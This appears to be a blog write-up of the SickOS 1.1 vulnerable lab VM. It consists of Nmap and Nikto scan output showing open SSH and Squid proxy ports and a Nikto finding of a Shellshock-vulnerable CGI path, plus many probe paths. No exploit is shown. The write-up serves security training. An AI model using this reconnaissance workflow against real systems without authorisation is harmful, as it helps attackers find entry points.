Thursday, 19 January 2017

SickOS 1.1

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of SickOs 1.1 vulnarable VM: 
https://www.vulnhub.com/entry/sickos-11,132/
Home brewed tools used: https://github.com/iuristanchev/pentesting_tools
_____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname    
 -----------------------------------------------------------------------------
 192.168.1.9     00:0c:29:41:9f:01     14     840  VMware, Inc.              



/nmap.sh 192.168.1.9

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Initiating ARP Ping Scan at 20:26
Scanning 192.168.1.9 [1 port]
Completed ARP Ping Scan at 20:26, 0.02s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:26
Completed Parallel DNS resolution of 1 host. at 20:26, 0.10s elapsed
Nmap scan report for 192.168.1.9
Host is up (0.00017s latency).
MAC Address: 00:0C:29:41:9F:01 (VMware)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds
           Raw packets sent: 1 (28B) | Rcvd: 1 (28B)

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00011s latency).
PORT   STATE    SERVICE
80/tcp filtered http
MAC Address: 00:0C:29:41:9F:01 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.44 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00016s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
MAC Address: 00:0C:29:41:9F:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00012s latency).
PORT    STATE         SERVICE
161/udp open|filtered snmp
MAC Address: 00:0C:29:41:9F:01 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.48 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00046s latency).
PORT     STATE    SERVICE       VERSION
21/tcp   filtered ftp
22/tcp   open     ssh           OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
23/tcp   filtered telnet
25/tcp   filtered smtp
53/tcp   filtered domain
80/tcp   filtered http
110/tcp  filtered pop3
111/tcp  filtered rpcbind
135/tcp  filtered msrpc
139/tcp  filtered netbios-ssn
143/tcp  filtered imap
443/tcp  filtered https
445/tcp  filtered microsoft-ds
993/tcp  filtered imaps
995/tcp  filtered pop3s
1723/tcp filtered pptp
3306/tcp filtered mysql
3389/tcp filtered ms-wbt-server
5900/tcp filtered vnc
8080/tcp closed   http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.46 ms 192.168.1.9

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4.78 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00015s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open   http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
8080/tcp closed http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.44 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
WARNING: No targets were specified, so 0 hosts scanned.
Nmap done: 0 IP addresses (0 hosts up) scanned in 0.47 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2017-01-11 20:26 EET
Nmap scan report for 192.168.1.9
Host is up (0.00017s latency).
Not shown: 65532 filtered ports
PORT     STATE  SERVICE
22/tcp   open   ssh
|_banner: SSH-2.0-OpenSSH_5.9p1 Debian-5ubuntu1.1
3128/tcp open   squid-http
8080/tcp closed http-proxy
MAC Address: 00:0C:29:41:9F:01 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 116.38 seconds
() Status: Up
     
192.168.1.9:3128 set it as proxy

./http_scan_proxy.sh 192.168.1.9 80 3128
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.9
+ Target Hostname:    192.168.1.9
+ Target Port:        80
+ Proxy:              192.168.1.9:3128
+ Using Encoding:     Random URI encoding (non-UTF8)
+ Start Time:         2017-01-11 21:06:01 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Ubuntu)
+ Retrieved via header: 1.0 localhost (squid/3.1.19)
+ Retrieved x-powered-by header: PHP/5.3.10-1ubuntu3.21
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-cache-lookup' found, with contents: MISS from localhost:3128
+ Uncommon header 'x-cache' found, with contents: MISS from localhost
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ lines
+ Server leaks inodes via ETags, header found with file /robots.txt, inode: 265381, size: 45, mtime: Sat Dec  5 02:35:02 2015
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Server banner has changed from 'Apache/2.2.22 (Ubuntu)' to 'squid/3.1.19' which may suggest a WAF, load balancer or proxy is in place
+ Uncommon header 'x-squid-error' found, with contents: ERR_INVALID_REQ 0
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ Uncommon header 'nikto-added-cve-2014-6278' found, with contents: true
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /cgi-bin/status: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ /webcgi/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-915/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-bin/cart32.exe: request cart32.exe/cart32clientlist
+ /htbin/cart32.exe: request cart32.exe/cart32clientlist
+ /cgibin/cart32.exe: request cart32.exe/cart32clientlist
+ /cgis/cart32.exe: request cart32.exe/cart32clientlist
+ /scripts/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-exe/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-perl/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi-bin-sdb/cart32.exe: request cart32.exe/cart32clientlist
+ /cgi/classified.cgi: Check Phrack 55 for info by RFP
+ /fcgi-bin/classified.cgi: Check Phrack 55 for info by RFP
+ /cgi-exe/classified.cgi: Check Phrack 55 for info by RFP
+ /cgi-bin-sdb/classified.cgi: Check Phrack 55 for info by RFP
+ /htbin/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-win/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-exe/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /cgi-perl/download.cgi: v1 by Matt Wright; check info in Phrack 55 by RFP
+ /webcgi/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-bin/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgis/flexform.cgi: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-915/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /cgi-win/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /fcgi-bin/flexform: Check Phrack 55 for info by RFP, allows to append info to writable files.
+ /scripts/lwgate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-win/lwgate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /webcgi/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-915/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-bin/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgi-perl/LWGate.cgi: Check Phrack 55 for info by RFP, http://www.phrack.com/show.php?p=55&a=7
+ /cgibin/lwgate: Check Phrack 55 for info by RFP
+ /scripts/lwgate: Check Phrack 55 for info by RFP
+ /cgi-915/LWGate: Check Phrack 55 for info by RFP
+ /cgi/LWGate: Check Phrack 55 for info by RFP
+ /cgi-exe/LWGate: Check Phrack 55 for info by RFP
+ /webcgi/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-bin/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /htbin/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgis/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /scripts/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-exe/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-perl/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-bin-sdb/perlshop.cgi: v3.1 by ARPAnet.com; check info in Phrack 55 by RFP
+ /cgi-915/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /cgibin/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /fcgi-bin/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /cgi-exe/handler.cgi: Variation of Irix Handler? Has been seen from other CGI scanners.
+ /webcgi/finger: finger other users, may be other commands?
+ /cgi-bin/finger: finger other users, may be other commands?
+ /cgi-win/finger: finger other users, may be other commands?
+ /fcgi-bin/finger: finger other users, may be other commands?
+ /cgi-bin-sdb/finger: finger other users, may be other commands?
+ /htbin/finger.pl: finger other users, may be other commands?
+ /cgibin/finger.pl: finger other users, may be other commands?
+ /cgi-perl/finger.pl: finger other users, may be other commands?
+ /cgi-bin-sdb/finger.pl: finger other users, may be other commands?
+ /cgi-915/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgi-win/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /fcgi-bin/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgi-perl/get32.exe: This can allow attackers to execute arbitrary commands remotely.
+ /cgibin/guestbook/passwd: GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.
+ /scripts/guestbook/passwd: GuestBook r4 from lasource.r2.ru stores the admin password in a plain text file.
+ /htbin/photo/protected/manage.cgi: My Photo Gallery management interface. May allow full access to photo galleries and more. Versions before 3.8 allowed anyone to view contents of any directory on systems.
+ /cgi-915/wrap.cgi: possible variation: comes with IRIX 6.2; allows to view directories
+ /fcgi-bin/wrap.cgi: possible variation: comes with IRIX 6.2; allows to view directories
+ /forums/config.php: PHP Config file may contain database IDs and passwords.
+ OSVDB-59620: /inc/common.load.php: Bookmark4U v1.8.3 include files are not protected and may contain remote source injection by using the 'prefix' variable.
+ /webcgi/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /htbin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgibin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi-win/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /fcgi-bin/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /cgi-perl/visadmin.exe: This CGI allows an attacker to crash the web server. Remove it from the CGI directory.
+ /webcgi/html2chtml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-win/html2chtml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-perl/html2wml.cgi: Html2Wml < 0.4.8 access local files via CGI, and more
+ /cgi-915/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /scripts/guestbook.cgi: May allow attackers to execute commands as the web daemon.
+ /cgi-perl/guestbook.pl: May allow attackers to execute commands as the web daemon.
+ /cgi-bin-sdb/guestbook.pl: May allow attackers to execute commands as the web daemon.
+ /cgi/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /cgi-win/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /fcgi-bin/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ /cgi-exe/ss: Mediahouse Statistics Server may allow attackers to execute remote commands. Upgrade to the latest version or remove from the CGI directory.
+ OSVDB-8204: /gb/index.php?login=true: gBook may allow admin login by setting the value 'login' equal to 'true'.
+ /htbin/gH.cgi: Web backdoor by gH
+ /scripts/gH.cgi: Web backdoor by gH
+ /cgi-win/gH.cgi: Web backdoor by gH
+ /fcgi-bin/gH.cgi: Web backdoor by gH
+ /cgi-bin-sdb/gm-cplog.cgi: GreyMatter log file defaults to mode 666 and contains login and passwords used to update the GM site. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /getaccess: This may be an indication that the server is running getAccess for SSO
+ /cgi-bin/gm.cgi: GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /cgis/gm.cgi: GreyMatter blogger may reveal user IDs/passwords through a gmrightclick-######.reg files (# are numbers), possibly in /archive or other archive location. See http://www.attrition.org/~jericho/works/security/greymatter.html for more info.
+ /cgi-915/AT-admin.cgi: Admin interface...
+ /cgi-bin-sdb/AT-admin.cgi: Admin interface...
+ /cgi-bin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /htbin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgibin/mt-static/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi-915/mt/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi-bin-sdb/mt/mt-check.cgi: Movable Type weblog diagnostic script found. Reveals docroot path, operating system, Perl version, and modules.
+ /cgi/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /fcgi-bin/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-perl/banner.cgi: This CGI may allow attackers to read any file on the system.
+ /webcgi/bannereditor.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-bin/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgibin/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgis/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-win/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-exe/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-bin-sdb/architext_query.pl: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /webcgi/bizdb1-search.cgi: This CGI may allow attackers to execute commands remotely. See http://www.hack.co.za/daem0n/cgi/cgi/bizdb.htm
+ /cgi-bin/blog/mt-load.cgi: Movable Type weblog installation CGI found. May be able to reconfigure or reload.
+ /vgn/vr/Editing: Vignette CMS admin/maintenance script available.
+ OSVDB-17652: /SiteServer/admin/findvserver.asp: Gives a list of installed Site Server components.
+ OSVDB-2878: /cgibin/moin.cgi?test: MoinMoin 1.1 and prior contain at least two XSS vulnerabilities. Version 1.0 and prior also contains a XSLT related vulnerability
+ /clusterframe.jsp: Macromedia JRun 4 build 61650 remote administration interface is vulnerable to several XSS attacks.
+ /scripts/tools/dsnform: Allows creation of ODBC Data Source
+ /readme.eml: Remote server may be infected with the Nimda virus.
+ /ows/restricted%2eshow: OWS may allow restricted files to be viewed by replacing a character with its encoded equivalent.
+ /WEB-INF./web.xml: Multiple implementations of j2ee servlet containers allow files to be retrieved from WEB-INF by appending a '.' to the directory name. Products include Sybase EA Service, Oracle Containers, Orion, JRun, HPAS, Pramati and others. See http://www.westpoint.l
+ OSVDB-42680: /vider.php3: MySimpleNews may allow deleting of news items without authentication.
+ OSVDB-6181: /officescan/cgi/cgiChkMasterPwd.exe: Trend Micro Officescan allows you to skip the login page and access some CGI programs directly.
+ /webcgi/astrocam.cgi: Astrocam 1.4.1 contained buffer overflow http://www.securityfocus.com/bid/4684. Prior to 2.1.3 contained unspecified security bugs
+ /cgi-bin-sdb/astrocam.cgi: Astrocam 1.4.1 contained buffer overflow http://www.securityfocus.com/bid/4684. Prior to 2.1.3 contained unspecified security bugs
+ /webcgi/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /cgi-915/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /cgi-perl/badmin.cgi: BannerWheel v1.0 is vulnerable to a local buffer overflow. If this is version 1.0 it should be upgraded.
+ /webcgi/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /scripts/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-win/ezadmin.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-bin/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgibin/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-win/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-exe/ezboard.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /cgi-bin/ezman.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ /scripts/ezman.cgi: Some versions of this CGI are vulnerable to a buffer overflow.
+ OSVDB-11741: /htbin/foxweb.exe: Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.
+ OSVDB-11741: /scripts/foxweb.exe: Foxweb 2.5 and below is vulnerable to a buffer overflow (not tested or confirmed). Verify Foxweb is the latest available version.
+ /cgi-915/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /fcgi-bin/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /cgi-exe/mgrqcgi: This CGI from Magic Enterprise 8.30-5 and earlier is vulnerable to multiple buffer overflows. Upgrade to 9.x.
+ /servlet/com.unify.servletexec.UploadServlet: This servlet allows attackers to upload files to the server.
+ /cgi-exe/uploader.exe: This CGI allows attackers to upload files to the server and then execute them.
+ /cgi-perl/uploader.exe: This CGI allows attackers to upload files to the server and then execute them.
+ /upload.asp: An ASP page that allows attackers to upload files to server
+ /uploadx.asp: An ASP page that allows attackers to upload files to server
+ /wa.exe: An ASP page that allows attackers to upload files to server
+ /webcgi/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /scripts/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /cgi-win/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /cgi-bin-sdb/fpsrvadm.exe: Potentially vulnerable CGI program.
+ /vgn/ac/delete: Vignette CMS admin/maintenance script available.
+ /vgn/ac/edit: Vignette CMS admin/maintenance script available.
+ /vgn/jsp/style: Vignette CMS admin/maintenance script available.
+ OSVDB-41850: /mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb: MPCSoftWeb Guest Book passwords retrieved.
+ OSVDB-319: /scripts/mailit.pl: Sambar may allow anonymous email to be sent from any host via this CGI.
+ OSVDB-319: /cgi-bin-sdb/mailit.pl: Sambar may allow anonymous email to be sent from any host via this CGI.
+ OSVDB-11093: /cgi/%2e%2e/abyss.conf: The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/
+ OSVDB-11093: /cgis/%2e%2e/abyss.conf: The Abyss configuration file was successfully retrieved. Upgrade with the latest version/patches for 1.0 from http://www.aprelium.com/
+ OSVDB-6467: /pw/storemgr.pw: Encrypted ID/Pass for Mercantec's SoftCart, http://www.mercantec.com/, see http://www.mindsec.com/advisories/post2.txt for more information.
+ /shopa_sessionlist.asp: VP-ASP shopping cart test application is available from the web. This page may give the location of .mdb files which may also be available.
+ /typo3conf/localconf.php: TYPO3 config file found.
+ /typo/typo3conf/localconf.php: TYPO3 config file found.
+ OSVDB-4907: /vgn/license: Vignette server license file found.
+ /webcart/config/clients.txt: This may allow attackers to read credit card data. Reconfigure to make this file not accessible via the web.
+ /ws_ftp.ini: Can contain saved passwords for FTP sites
+ /WS_FTP.ini: Can contain saved passwords for FTP sites
+ OSVDB-11871: /webcgi/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-exe/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-perl/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ OSVDB-11871: /cgi-bin-sdb/MsmMask.exe: MondoSearch 4.4 may allow source code viewing by requesting MsmMask.exe?mask=/filename.asp where 'filename.asp' is a real ASP file.
+ /cgibin/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /fcgi-bin/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi-exe/addbanner.cgi: This CGI may allow attackers to read any file on the system.
+ /cgi/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgi-bin/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgibin/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /cgis/aglimpse.cgi: This CGI may allow attackers to execute remote commands.
+ /htbin/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgi-win/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgi-exe/aglimpse: This CGI may allow attackers to execute remote commands.
+ /cgibin/architext_query.cgi: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-exe/architext_query.cgi: Versions older than 1.1 of Excite for Web Servers allow attackers to execute arbitrary commands.
+ /cgi-bin/cmd.exe?/c+dir: cmd.exe can execute arbitrary commands
+ /fcgi-bin/cmd.exe?/c+dir: cmd.exe can execute arbitrary commands
+ /fcgi-bin/cmd1.exe?/c+dir: cmd1.exe can execute arbitrary commands
+ /cgibin/archie: Gateway to the unix command, may be able to submit extra commands
+ /cgis/archie: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/archie: Gateway to the unix command, may be able to submit extra commands
+ /cgi-perl/archie: Gateway to the unix command, may be able to submit extra commands
+ /webcgi/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /cgi-bin/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /cgi-perl/calendar.pl: Gateway to the unix command, may be able to submit extra commands
+ /webcgi/calendar: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/calendar: Gateway to the unix command, may be able to submit extra commands
+ /cgi-win/calendar: Gateway to the unix command, may be able to submit extra commands
+ /htbin/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgi-exe/fortune: Gateway to the unix command, may be able to submit extra commands
+ /cgi/redirect: Redirects via URL from form
+ /scripts/redirect: Redirects via URL from form
+ /cgi-win/redirect: Redirects via URL from form
+ /cgi-exe/redirect: Redirects via URL from form
+ /cgi-bin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgibin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgis/uptime: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/uptime: Gateway to the unix command, may be able to submit extra commands
+ /cgi-bin/wais.pl: Gateway to the unix command, may be able to submit extra commands
+ /fcgi-bin/wais.pl: Gateway to the unix command, may be able to submit extra commands
+ /names.nsf: User names and groups can be accessed remotely (possibly password hashes as well)
+ /webcgi/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /cgi-915/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /cgi/mail: Simple Perl mailing script to send form data to a pre-configured email address
+ /scripts/nph-error.pl: Gives more information in error messages
+ /cgi-perl/post-query: Echoes back result of your POST
+ /cgi-bin-sdb/post-query: Echoes back result of your POST
+ /cgi-915/query: Echoes back result of your GET
+ /htbin/query: Echoes back result of your GET
+ /scripts/query: Echoes back result of your GET
+ /fcgi-bin/query: Echoes back result of your GET
+ /cgibin/test-env: May echo environment variables or give directory listings
+ /cgis/test-env: May echo environment variables or give directory listings
+ /cgi-exe/test-env: May echo environment variables or give directory listings
+ /cgi-perl/test-env: May echo environment variables or give directory listings
+ /admin-serv/config/admpw: This file contains the encrypted Netscape admin password. It should not be accessible via the web.
+ /tree: WASD Server reveals the entire web root structure and files via this URL. Upgrade to a later version and secure according to the documents on the WASD web site.
+ /852566C90012664F: This database can be read using the replica ID without authentication.
+ /hidden.nsf: This database can be read without authentication. Common database name.
+ /cgi-915/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgis/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi-perl/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ /cgi-bin-sdb/cgitest.exe: This CGI allows remote users to download other CGI source code. May have a buffer overflow in the User-Agent header.
+ OSVDB-6666: /webcgi/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /cgi/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /htbin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ OSVDB-6666: /scripts/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools may be vulnerable to a DoS by requesting hpnst.exe?c=p+i=hpnst.exe multiple times.
+ /contents/extensions/asp/1: The IIS system may be vulnerable to a DOS, see http://www.microsoft.com/technet/security/bulletin/MS02-018.asp for details.
+ OSVDB-55370: /cgibin/Pbcgi.exe: Sambar may be vulnerable to a DOS when a long string is passed to Pbcgi.exe (not attempted). Default CGI should be removed from web servers.
